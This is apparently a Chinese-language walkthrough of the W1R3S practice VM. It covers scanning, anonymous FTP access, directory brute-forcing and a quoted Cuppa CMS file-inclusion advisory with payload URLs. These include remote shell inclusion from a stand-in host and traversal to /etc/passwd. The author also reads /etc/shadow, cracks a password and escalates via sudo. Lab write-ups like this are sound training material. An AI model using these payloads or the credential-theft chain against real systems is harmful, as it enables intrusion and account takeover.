前言
這靶機挺簡單的。雖然網友們有分享oscp向的靶機集,但是沒有一個難度梯度,做起來就怪怪的。
打點
nmap -sP 192.168.218.0/24
發現主機IP 192.168.218.134
掃描埠:nmap -sV -p- -A 192.168.218.134
Nmap scan report for 192.168.218.134
Host is up (0.00014s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.218.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:89:01:F2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.14 ms 192.168.218.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.51 seconds
開了如上ssh,web,ftp,mysql四個服務。
ftp存在匿名登陸(使用者名稱ftp,密碼為空)
然後手動ls加get把檔案下載下來
檔案內容除了employee-name其他都是老謎語人了。
web頁面訪問是apache的預設頁面,暴露了路徑/var/www/html/,但是ftp切換目錄失敗,上傳未遂。
使用dirb和dirsearch爆破網站目錄
這裡就稍微記兩個可能存在問題的目錄吧:
administrator/
administrator/api/test/
administrator/api/administrator/
wordpress/
wordpress/wp-login.php
主要是很多目錄都是可以直接遍歷的,看到很多php檔案,但沒有原始碼
訪問administrator/會跳轉到administrator/installation 標籤頁顯示Cuppa CMS
訪問這些目錄,發現有些目錄比如wp-login.php會指向localhost,就很奇怪。
exploit-db上查到存在一個檔案包含漏洞,既可以遠端,又可以本地
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
訪問漏洞檔案http://192.168.218.134/administrator/alerts/alertConfigField.php,發現真的存在。
exp中給的方式都讀不了,但發現描述中提到漏洞點用的是$_REQUEST
那換成post方式試試?讀取成功
現在嘗試一下能不能包含遠端檔案拿個shell
本地python3 -m http.server起一個http服務,放了一個shell.txt
但是嘗試包含了幾次,頁面沒反應,日誌上也沒有來自靶機的訪問記錄。看樣子是行不通了。
那隻能包含/etc/shadow來爆破密碼了
坑點是得手動調一下你從頁面上覆制過去的shadow格式,每個賬號一行。
成功得到一組賬號密碼 w1r3s computer
提權
ssh登陸,開始提權。輸入id命令發現直接可以sudo,,,
sudo su切root,遊戲結束。
